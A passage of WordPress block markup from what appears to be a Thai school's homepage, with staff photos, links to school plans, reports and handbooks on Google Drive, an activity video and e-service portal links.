-->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":754,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/11/560432794_122252459414202781_8219191812793928684_n-1024x726.jpg\" alt=\"\" class=\"wp-image-754\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:gallery {\"ids\":[260],\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":757,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/11/572095115_122254848554202781_886880693938319365_n-1-1024x538.jpg\" alt=\"\" class=\"wp-image-757\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:heading {\"textAlign\":\"center\",\"level\":5} -->\n<h5 class=\"wp-block-heading has-text-align-center\"><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=sharing\">แผนปฏิบัติการประจำปีการศึกษา</a></h5>\n<!-- /wp:heading -->\n\n<!-- wp:heading {\"textAlign\":\"center\",\"level\":5,\"align\":\"full\"} -->\n<h5 class=\"wp-block-heading alignfull has-text-align-center\"><a href=\"https://drive.google.com/file/d/1q0z8a2Mbu3x-c8vLwrElwX6v8BJY7jtB/view?usp=sharing\">แผนพัฒนาการจัดการศึกษา</a></h5>\n<!-- /wp:heading -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"3298cf22\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"ea4e4ab8\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br><a href=\"https://drive.google.com/file/d/1cgINnIyago0IrJkXeI7V2y4G4p5Zq3yR/view?usp=sharing\">     - คู่มือฝ่ายบริหารงานงบประมาณ</a><br><a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 